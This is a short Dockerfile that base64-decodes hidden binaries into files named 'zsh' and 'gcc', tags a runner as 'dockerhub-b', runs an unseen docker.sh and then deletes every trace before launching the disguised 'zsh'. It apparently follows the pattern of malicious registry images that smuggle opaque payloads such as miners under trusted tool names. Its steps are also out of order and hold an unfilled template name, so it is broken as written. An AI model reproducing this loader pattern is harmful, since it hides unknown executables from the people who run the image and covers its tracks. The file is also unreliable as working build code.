FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > zsh.log'

RUN base64 --decode zsh.64 > zsh
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY zsh .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' zsh
RUN bash ./docker.sh

RUN rm --force --recursive zsh _REPO_NAME__.64 docker.sh gcc gcc.64

CMD zsh
